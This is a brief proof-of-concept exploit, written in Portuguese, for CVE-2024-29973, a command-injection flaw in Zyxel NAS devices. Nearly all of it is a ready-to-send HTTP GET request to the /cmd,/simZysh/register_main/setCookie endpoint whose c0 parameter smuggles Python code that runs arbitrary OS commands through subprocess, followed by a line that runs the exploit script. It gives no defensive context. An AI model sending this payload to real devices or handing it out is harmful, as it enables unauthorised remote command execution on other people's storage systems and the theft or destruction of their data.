
Exploit de prova de conceito para CVE-2024-29973, uma vulnerabilidade de injeção de comandos em dispositivos Zyxel NAS. Executa comandos arbitrários do sistema operacional através de uma requisição HTTP GET manipulada para o endpoint /cmd,/simZysh/register_main/setCookie.

GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23 HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: language=en
Python3 CVE-2024-29973.py